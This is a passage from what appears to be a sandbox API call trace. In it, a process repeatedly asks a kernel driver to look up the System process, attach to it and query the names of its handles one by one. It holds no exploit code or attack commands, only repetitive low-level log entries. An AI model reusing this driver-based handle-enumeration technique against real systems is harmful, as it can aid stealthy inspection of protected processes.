hHeap=0x290000) returned 1 [0119.558] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.559] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.559] PsAcquireProcessExitSynchronization () returned 0x0 [0119.559] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.559] ObReferenceObjectByHandle (in: Handle=0xffffffff80000670, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8ff20, HandleInformation=0x0) returned 0x0 [0119.559] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.559] PsReleaseProcessExitSynchronization () returned 0x2 [0119.559] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.559] ObQueryNameString (in: Object=0xfffffa8001f8ff20, ObjectNameInfo=0xfffffa800290c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290c044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.559] ObfDereferenceObject (Object=0xfffffa8001f8ff20) returned 0x2 [0119.559] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.559] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.559] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.559] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.559] PsAcquireProcessExitSynchronization () returned 0x0 [0119.559] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.559] ObReferenceObjectByHandle (in: Handle=0xffffffff80000674, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003aa5f20, HandleInformation=0x0) returned 0x0 [0119.560] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.560] PsReleaseProcessExitSynchronization () returned 0x2 [0119.560] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.560] ObQueryNameString (in: Object=0xfffffa8003aa5f20, ObjectNameInfo=0xfffffa800290d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290d044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.560] ObfDereferenceObject (Object=0xfffffa8003aa5f20) returned 0x2 [0119.560] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.560] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.560] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.560] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.560] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.560] PsAcquireProcessExitSynchronization () returned 0x0 [0119.560] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.560] ObReferenceObjectByHandle (in: Handle=0xffffffff80000678, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8d460, HandleInformation=0x0) returned 0x0 [0119.560] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.560] PsReleaseProcessExitSynchronization () returned 0x2 [0119.561] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.561] ObQueryNameString (in: Object=0xfffffa8001f8d460, ObjectNameInfo=0xfffffa800290e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290e044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.561] ObfDereferenceObject (Object=0xfffffa8001f8d460) returned 0x2 [0119.561] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.561] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.561] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.561] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.561] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.561] PsAcquireProcessExitSynchronization () returned 0x0 [0119.561] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.561] ObReferenceObjectByHandle (in: Handle=0xffffffff8000067c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f56460, HandleInformation=0x0) returned 0x0 [0119.561] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.561] PsReleaseProcessExitSynchronization () returned 0x2 [0119.561] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.561] ObQueryNameString (in: Object=0xfffffa8001f56460, ObjectNameInfo=0xfffffa8002890044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002890044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.562] ObfDereferenceObject (Object=0xfffffa8001f56460) returned 0x2 [0119.562] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.562] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.562] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.562] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.562] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.562] PsAcquireProcessExitSynchronization () returned 0x0 [0119.562] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.562] ObReferenceObjectByHandle (in: Handle=0xffffffff80000680, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8ee50, HandleInformation=0x0) returned 0x0 [0119.562] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.562] PsReleaseProcessExitSynchronization () returned 0x2 [0119.562] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.562] ObQueryNameString (in: Object=0xfffffa8001f8ee50, ObjectNameInfo=0xfffffa80028856c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028856c4, ReturnLength=0xfffff88005163550) returned 0x0 [0119.562] ObfDereferenceObject (Object=0xfffffa8001f8ee50) returned 0x2 [0119.562] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.563] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.563] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.563] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0119.563] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.563] PsAcquireProcessExitSynchronization () returned 0x0 [0119.563] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.563] ObReferenceObjectByHandle (in: Handle=0xffffffff80000684, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002152810, HandleInformation=0x0) returned 0x0 [0119.563] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.563] PsReleaseProcessExitSynchronization () returned 0x2 [0119.563] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.563] ObQueryNameString (in: Object=0xfffffa8002152810, ObjectNameInfo=0xfffffa800288b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288b044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.563] ObfDereferenceObject (Object=0xfffffa8002152810) returned 0x2 [0119.564] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.564] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.564] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.564] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.564] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.564] PsAcquireProcessExitSynchronization () returned 0x0 [0119.564] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.564] ObReferenceObjectByHandle (in: Handle=0xffffffff80000688, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8c2c0, HandleInformation=0x0) returned 0x0 [0119.564] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.564] PsReleaseProcessExitSynchronization () returned 0x2 [0119.564] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.564] ObQueryNameString (in: Object=0xfffffa8001f8c2c0, ObjectNameInfo=0xfffffa8002895044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002895044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.564] ObfDereferenceObject (Object=0xfffffa8001f8c2c0) returned 0x2 [0119.564] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.564] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.564] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.564] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.564] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.565] PsAcquireProcessExitSynchronization () returned 0x0 [0119.565] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.565] ObReferenceObjectByHandle (in: Handle=0xffffffff8000068c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f80ab0, HandleInformation=0x0) returned 0x0 [0119.565] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.565] PsReleaseProcessExitSynchronization () returned 0x2 [0119.565] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.565] ObQueryNameString (in: Object=0xfffffa8001f80ab0, ObjectNameInfo=0xfffffa8002894044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002894044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.565] ObfDereferenceObject (Object=0xfffffa8001f80ab0) returned 0x2 [0119.565] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.565] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.565] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.565] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.565] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.565] PsAcquireProcessExitSynchronization () returned 0x0 [0119.565] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.565] ObReferenceObjectByHandle (in: Handle=0xffffffff80000690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8dd20, HandleInformation=0x0) returned 0x0 [0119.565] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.565] PsReleaseProcessExitSynchronization () returned 0x2 [0119.565] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.565] ObQueryNameString (in: Object=0xfffffa8001f8dd20, ObjectNameInfo=0xfffffa800288e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288e044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.566] ObfDereferenceObject (Object=0xfffffa8001f8dd20) returned 0x2 [0119.566] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.566] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.566] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.566] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.566] PsAcquireProcessExitSynchronization () returned 0x0 [0119.566] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.566] ObReferenceObjectByHandle (in: Handle=0xffffffff80000694, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f7ff20, HandleInformation=0x0) returned 0x0 [0119.566] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.566] PsReleaseProcessExitSynchronization () returned 0x2 [0119.566] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.566] ObQueryNameString (in: Object=0xfffffa8001f7ff20, ObjectNameInfo=0xfffffa8002891044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002891044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.566] ObfDereferenceObject (Object=0xfffffa8001f7ff20) returned 0x2 [0119.566] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.566] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.566] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.566] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.566] PsAcquireProcessExitSynchronization () returned 0x0 [0119.567] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.567] ObReferenceObjectByHandle (in: Handle=0xffffffff80000698, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8c050, HandleInformation=0x0) returned 0x0 [0119.567] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.567] PsReleaseProcessExitSynchronization () returned 0x2 [0119.567] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.567] ObQueryNameString (in: Object=0xfffffa8001f8c050, ObjectNameInfo=0xfffffa80028ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.567] ObfDereferenceObject (Object=0xfffffa8001f8c050) returned 0x2 [0119.567] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.567] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.567] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.567] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.567] PsAcquireProcessExitSynchronization () returned 0x0 [0119.567] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.567] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8cb80, HandleInformation=0x0) returned 0x0 [0119.567] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.567] PsReleaseProcessExitSynchronization () returned 0x2 [0119.567] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.567] ObQueryNameString (in: Object=0xfffffa8001f8cb80, ObjectNameInfo=0xfffffa800288a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288a044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.567] ObfDereferenceObject (Object=0xfffffa8001f8cb80) returned 0x2 [0119.567] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.567] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.568] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.568] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.568] PsAcquireProcessExitSynchronization () returned 0x0 [0119.568] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.568] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f81b80, HandleInformation=0x0) returned 0x0 [0119.568] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.568] PsReleaseProcessExitSynchronization () returned 0x2 [0119.568] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.568] ObQueryNameString (in: Object=0xfffffa8001f81b80, ObjectNameInfo=0xfffffa800288f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288f044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.568] ObfDereferenceObject (Object=0xfffffa8001f81b80) returned 0x2 [0119.568] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.568] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.568] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.568] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.568] PsAcquireProcessExitSynchronization () returned 0x0 [0119.568] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.568] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8a2c0, HandleInformation=0x0) returned 0x0 [0119.568] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.568] PsReleaseProcessExitSynchronization () returned 0x2 [0119.568] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.568] ObQueryNameString (in: Object=0xfffffa8001f8a2c0, ObjectNameInfo=0xfffffa8002892044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002892044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.568] ObfDereferenceObject (Object=0xfffffa8001f8a2c0) returned 0x2 [0119.568] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.568] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.568] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.568] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.568] PsAcquireProcessExitSynchronization () returned 0x0 [0119.568] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.569] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f81050, HandleInformation=0x0) returned 0x0 [0119.569] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.569] PsReleaseProcessExitSynchronization () returned 0x2 [0119.569] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.569] ObQueryNameString (in: Object=0xfffffa8001f81050, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.569] ObfDereferenceObject (Object=0xfffffa8001f81050) returned 0x2 [0119.569] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.569] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.569] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.569] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.569] PsAcquireProcessExitSynchronization () returned 0x0 [0119.569] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: 